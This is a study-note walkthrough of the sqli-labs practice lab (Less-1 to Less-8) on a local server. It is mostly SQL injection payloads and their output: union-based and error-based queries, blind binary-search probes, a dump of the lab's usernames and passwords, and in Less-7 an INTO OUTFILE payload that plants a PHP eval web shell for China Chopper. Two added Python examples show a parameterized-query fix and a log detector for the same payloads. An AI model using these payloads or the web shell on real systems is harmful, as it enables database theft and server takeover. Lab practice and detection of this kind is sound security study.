This was copied from the notes your senior Linglan (铃兰) put together, although she was rather reluctant.

(Only up to level 8 so far; I trust she will keep at it and finish them all. I will keep updating this too. This was set up locally; if you want it, ask your senior Linglan!!!)

less-1:

1. Get the current database name

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select database())--+

SELECT * FROM users WHERE id='' union select 1,2,(select database())-- ' LIMIT 0,1

Your Login name:2

Your Password:security

Current database name: security
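To make the root cause of Less-1 concrete, here is an added example (not from the lab or this write-up) that rebuilds the `SELECT * FROM users WHERE id='...' LIMIT 0,1` query in Python over an in-memory SQLite table, first by string splicing and then with a bound parameter; the sample rows and the use of sqlite_version() in place of MySQL's database() are assumptions so it runs offline.

```python
import sqlite3

# Constructed rows modelled on the lab's users table (id, username, password); SQLite stands in
# for the lab's MySQL so the example runs offline.
SAMPLE_USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (8, "admin", "admin")]

# The Less-1 payload shape: close the quote, UNION in attacker-chosen columns, comment out the tail.
# database() is MySQL-only, so the SQLite stand-in leaks sqlite_version() in the third column.
PAYLOAD = "' union select 1,2,(select sqlite_version())-- "

def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn

def lookup_vulnerable(conn: sqlite3.Connection, user_id: str):
    """Mirrors Less-1: the id parameter is spliced into the SQL text, so quotes change the query."""
    sql = f"SELECT * FROM users WHERE id='{user_id}' LIMIT 0,1"
    return conn.execute(sql).fetchone()

def lookup_fixed(conn: sqlite3.Connection, user_id: str):
    """Hardened form: a bound parameter is always data, never SQL, whatever it contains."""
    return conn.execute("SELECT * FROM users WHERE id=? LIMIT 0,1", (user_id,)).fetchone()

def leaked_value(conn: sqlite3.Connection):
    """Third column of the row the vulnerable lookup returns for the payload (None if nothing leaks)."""
    row = lookup_vulnerable(conn, PAYLOAD)
    return row[2] if row else None

if __name__ == "__main__":
    db = make_db()
    print("normal id=1, vulnerable:", lookup_vulnerable(db, "1"))
    print("payload,     vulnerable:", lookup_vulnerable(db, PAYLOAD))  # (1, 2, '<sqlite version>')
    print("payload,     fixed     :", lookup_fixed(db, PAYLOAD))       # None: no row has that id
```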

2. Get all database names

?id=' union select 1,2,(select group_concat(schema_name)from information_schema.schemata)--+

SELECT * FROM users WHERE id='' union select 1,2,(select group_concat(schema_name) from information_schema.schemata)-- ' LIMIT 0,1

Your Login name:2

Your Password:information_schema,challenges,info,mysql,news,performance_schema,register,security,text,yuan

All database names:

information_schema,challenges,info,mysql,news,performance_schema,register,security,text,yuan

3. Get table names

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 0x7365637572697479)--+

// 0x7365637572697479 is the hex form of the database name (security)

SELECT * FROM users WHERE id='' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 0x7365637572697479)-- ' LIMIT 0,1

Your Login name:2

Your Password:emails,referers,uagents,users

Tables in database security: emails,referers,uagents,users

4. Get column names

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema = 0x7365637572697479 and table_name=0x7573657273)--+

// 0x7573657273 is the table name: users

SELECT * FROM users WHERE id='' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema =0x7365637572697479 and table_name=0x7573657273)-- ' LIMIT 0,1

Your Login name:2

Your Password:id,username,password

Column names: id,username,password

5. Get the data

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)--+

// 0x7c is the `|` separator placed between the fields (visible as the pipe in the output below)

SELECT * FROM users WHERE id='' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)-- ' LIMIT 0,1

Your Login name:2

Your Password:1|Dumb|Dumb,2|Angelina|I-kill-you,3|Dummy|p@ssword,4|secure|crappy,5|stupid|stupidity,6|superman|genious,7|batman|mob!le,8|admin|admin,9|admin1|admin1,10|admin2|admin2,11|admin3|admin3,12|dhakkan|dumbo,14|admin4|admin4

Data: 1|Dumb|Dumb,2|Angelina|I-kill-you,3|Dummy|p@ssword,4|secure|crappy,5|stupid|stupidity,6|superman|genious,7|batman|mob!le,8|admin|admin,9|admin1|admin1,10|admin2|admin2,11|admin3|admin3,12|dhakkan|dumbo,14|admin4|admin4

6. Read the database data directory / get the installation path

http://localhost/sqli-labs-master/less-1/?id=0' union select 1,@@datadir,@@basedir--+

Your Login name:D:\wamp\bin\mysql\mysql5.6.12\data\

Your Password:D:/wamp/bin/mysql/mysql5.6.12

Database data path: D:\wamp\bin\mysql\mysql5.6.12\data\

MySQL installation path: D:/wamp/bin/mysql/mysql5.6.12

Less-2:

1. Get the number of columns:

http://localhost/sqli-labs-master/less-2/?id=1 order by 1,2,3,4--+

SELECT * FROM users WHERE id=1 order by 1,2,3,4-- LIMIT 0,1

Unknown column '4' in 'order clause'

(three columns in total)

2. Get the database name:

http://localhost/sqli-labs-master/less-2/?id=' ' union select  1,2,(select database())--+

(two single quotes, separated by a space, follow "id=")

SELECT * FROM users WHERE id=' ' union select 1,2,(select database())-- LIMIT 0,1

Your Login name:2

Your Password:security

Database: security

3. Get all database names:

http://localhost/sqli-labs-master/less-2/?id=' '

SELECT * FROM users WHERE id=' ' union select 1,2,(select group_concat(schema_name)from information_schema.schemata)-- LIMIT 0,1

Your Login name:2

Your Password:information_schema,challenges,info,mysql,news,performance_schema,register,security,text,yuan

All database names:

information_schema,challenges,info,mysql,news,performance_schema,register,security,text,yuan

4. Get table names:

http://localhost/sqli-labs-master/less-2/?id=%27%20%27%20union%20select%201,2,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema%20=%200x7365637572697479)--+

SELECT * FROM users WHERE id=' ' union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema=0x7365637572697479)-- LIMIT 0,1

Your Login name:2

Your Password:emails,referers,uagents,users

Tables in database 0x7365637572697479 (security): emails,referers,uagents,users

5. Get column names:

http://localhost/sqli-labs-master/less-2/?id=%27%20%27%20union%20select%201,2,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=0x7365637572697479%20and%20table_name=0x7573657273)--+

SELECT * FROM users WHERE id=' ' union select 1,2,(select group_concat(column_name)from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273)-- LIMIT 0,1

Your Login name:2

Your Password:id,username,password

Column names of table users in database security: id,username,password

6. Get the data in the table:

http://localhost/sqli-labs-master/less-2/?id=' ' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)--+

SELECT * FROM users WHERE id=' ' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)-- LIMIT 0,1

Your Login name:2

Your Password:1|Dumb|Dumb,2|Angelina|I-kill-you,3|Dummy|p@ssword,4|secure|crappy,5|stupid|stupidity,6|superman|genious,7|batman|mob!le,8|admin|admin,9|admin1|admin1,10|admin2|admin2,11|admin3|admin3,12|dhakkan|dumbo,14|admin4|admin4

Less-3

1. Get the number of columns:

http://localhost/sqli-labs-master/less-3/?id=1') order by 1,2,3,4--+

SELECT * FROM users WHERE id=('1') order by 1,2,3,4-- ') LIMIT 0,1

Unknown column '4' in 'order clause'

2. @@datadir reads the database data directory; @@basedir gets the MySQL installation path

http://localhost/sqli-labs-master/less-3/?id=0%27)%20union%20select%201,@@datadir,@@basedir--+

From here on the method is the same as in less-1 and less-2!!!

Less-4

1. Get the number of columns:

http://localhost/sqli-labs-master/less-4/?id=1") order by 1,2,3,4--+

SELECT * FROM users WHERE id=("1") order by 1,2,3,4-- ") LIMIT 0,1

Unknown column '4' in 'order clause'

2. Get the database name:

http://localhost/sqli-labs-master/less-4/?id=%22)%20union%20select%20%201,2,(select%20database())--+

3. All database names:

http://localhost/sqli-labs-master/less-4/?id=%22)union%20select%201,2,(select%20group_concat(schema_name)from%20information_schema.schemata)--+

4. Get table names:

http://localhost/sqli-labs-master/less-4/?id=%22)union%20select%201,2,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema%20=%200x7365637572697479)--+

5. Get column names:

http://localhost/sqli-labs-master/less-4/?id=%22)%20union%20select%201,2,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=0x7365637572697479%20and%20table_name=0x7573657273)--+

6. Get the data

http://localhost/sqli-labs-master/less-4/?id=%22)%20union%20select%201,2,(select%20group_concat(id,0x7c,username,0x7c,password)%20from%20security.users)--+

Less-5: (binary search)

1. Get the number of columns:

http://localhost/sqli-labs-master/less-5/?id=' order by 4--+

Four columns in total: Unknown column '4' in 'order clause'

2. Use an error message to get the number of databases:

http://localhost/sqli-labs-master/less-5/?id=1'+and(select 1 from (select count(*),concat((select(select(select concat(0x7e7e3a7e7e,count(distinct table_schema),0x7e7e3a7e7e) from information_schema.tables)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

Duplicate entry '~~:~~11~~:~~1' for key 'group_key'

==>> eleven databases in total

3. Use an error message to get a database name:

http://localhost/sqli-labs-master/less-5/?id=1' and (select 1 from (select count(*),concat((select (select (select distinct concat(0x7e7e3a7e7e,table_schema,0x7e7e3a7e7e) from information_schema.tables limit 8,1)) from information_schema.tables limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a)--+

Duplicate entry '~~:~~security~~:~~1' for key 'group_key'

==> the ninth database is named security

4. Use an error message to get table names:

First get the number of tables:

/less-5/?id=1' and (select 1 from (select count(*),concat((select (select(select concat(0x7e7e3a7e7e,count(table_name),0x7e7e3a7e7e)from information_schema.tables where table_schema=0x7365637572697479))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

==>Duplicate entry '~~:~~4~~:~~1' for key 'group_key'

Four tables in total

Then get the table names one by one:

?id=1' and (select 1 from (select count(*),concat((select(select(select concat (0x7e7e3a7e7e,table_name,0x7e7e3a7e7e)from information_schema.tables  where table_schema=0x7365637572697479 limit 3,1)) from information_schema.tables limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

Duplicate entry '~~:~~users~~:~~1' for key 'group_key'

5. Get the database version number:

http://localhost/sqli-labs-master/less-5/?id=1' and left(version(),1)=5--+

The left(string, n) function returns the leftmost n characters of string.

6. Use length() to get the length of the database name:

http://localhost/sqli-labs-master/less-5/?id=1' and length(database())=8 --+

The database name is 8 characters long;

7. Odd:

http://localhost/sqli-labs-master/less-5/?id=1' and length(db())=8 --+

Result: FUNCTION security.db does not exist

8. Get the database name: use binary search to obtain each letter

http://localhost/sqli-labs-master/less-5/?id=1' and left(database(),1) >'s'--+

The first letter is s;

http://localhost/sqli-labs-master/less-5/?id=1%27%20and%20left(database(),2)%20%3E%27se%27--+

The first two letters are se;

And so on...

9. Get the first character of the first table in database security:

First determine the length of the database's first table name:

http://localhost/sqli-labs-master//Less-5/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>6 --+

The length is 6;

/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables  where table_schema=database() limit 0,1),1,1))>101--+

/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables  where table_schema='security' limit 0,1),1,1))>101--+

The first letter is e;

/Less-5/?id=1' and length((select table_name from information_schema.tables where table_schema =database() limit 0,1))>10--+

Less-7:

1. Create a trojan file 7.php, connect to it with China Chopper (菜刀) (you must know the database username and password), then manage the database from there to obtain its contents

http://localhost/sqli-labs-master/less-7/?id=0%27))%20union%20select%201,2,%27%3C?php%20@eval($_POST[%27mima%27]);%20?%3E%27%20into%20outfile%20%27D://Demo//sqli-labs-master/less-7/7.php%27--+

less-8:

Blind injection requires familiarity with some MySQL functions:

length(str): returns the length of the string str.

substr(str, pos, len): returns len characters of str starting at position pos. Note that pos starts at 1, not at 0 as with array indices.

mid(str, pos, len): same as above, extracts a substring.

ascii(str): returns the ASCII code of the leftmost character of str.

ord(str): same as above, returns the ASCII code.

if(a, b, c): a is the condition; if a is true it returns b, otherwise c. For example, if(1>2,1,0) returns 0.

First, remember the common ASCII values: A: 65, Z: 90, a: 97, z: 122, 0: 48, 9: 57

First, select database() returns the current database name.

ascii(substr((select database()),1,1)): returns the first letter of the database name, converted to its ASCII code.

ascii(substr((select database()),1,1))>64: if the ASCII value is greater than 64 this is true, so the if() returns 1, otherwise 0.
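For the defending side, an added example (not part of the write-up) that URL-decodes request targets from web-server access logs and flags the payload families used across Less-1 to Less-8 above: UNION, information_schema enumeration, floor(rand(0)*2) error-based probes, ascii/length/left boolean probes, @@datadir/@@basedir reads and INTO OUTFILE; the log lines and signature names are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Signature families taken from the payload shapes in this write-up; matched after URL-decoding,
# since the same request appears both raw and percent-encoded (%27, %20, --+) in the notes.
SIGNATURES = {
    "union-based": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema-enum": re.compile(r"\binformation_schema\.(?:schemata|tables|columns)\b", re.I),
    "error-based": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "boolean-blind": re.compile(r"\b(?:ascii|length|left|substr|mid)\s*\(.*?(?:database\s*\(|table_name)", re.I),
    "server-vars": re.compile(r"@@(?:datadir|basedir|version)\b", re.I),
    "file-write": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
}
LOG_TARGET = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

def classify(target: str) -> list[str]:
    """Decode the request target ('+' becomes a space, as in '--+') and list the families it trips."""
    decoded = unquote_plus(target)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_log(log_text: str) -> list[tuple[str, list[str]]]:
    """Return (request_target, families) for every request in the log that trips a signature."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_TARGET.search(line)
        if m and (tags := classify(m.group(1))):
            hits.append((m.group(1), tags))
    return hits

# Constructed access-log lines (not real traffic) modelled on requests from this write-up, with
# the query strings percent-encoded the way a browser would send them.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli-labs/Less-1/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli-labs/Less-1/?id=%27%20union%20select%201,2,(select%20database())--+ HTTP/1.1" 200 498
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli-labs-master/less-4/?id=%22)union%20select%201,2,(select%20group_concat(schema_name)from%20information_schema.schemata)--+ HTTP/1.1" 200 610
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /sqli-labs-master/less-5/?id=1%27%20and%20left(database(),2)%20%3E%27se%27--+ HTTP/1.1" 200 455
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /sqli-labs-master/less-5/?id=1%27+and(select+1+from+(select+count(*),concat((select+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+ HTTP/1.1" 200 470
10.0.0.5 - - [01/Jan/2024:10:00:06 +0000] "GET /sqli-labs-master/less-3/?id=0%27)%20union%20select%201,@@datadir,@@basedir--+ HTTP/1.1" 200 520
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /sqli-labs-master/less-7/?id=0%27))%20union%20select%201,2,%27x%27%20into%20outfile%20%27/tmp/x%27--+ HTTP/1.1" 200 380
"""

if __name__ == "__main__":
    for target, tags in scan_log(SAMPLE_LOG):
        print(", ".join(tags).ljust(26), unquote_plus(target))
```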

PS: (your senior Linglan will keep updating this)
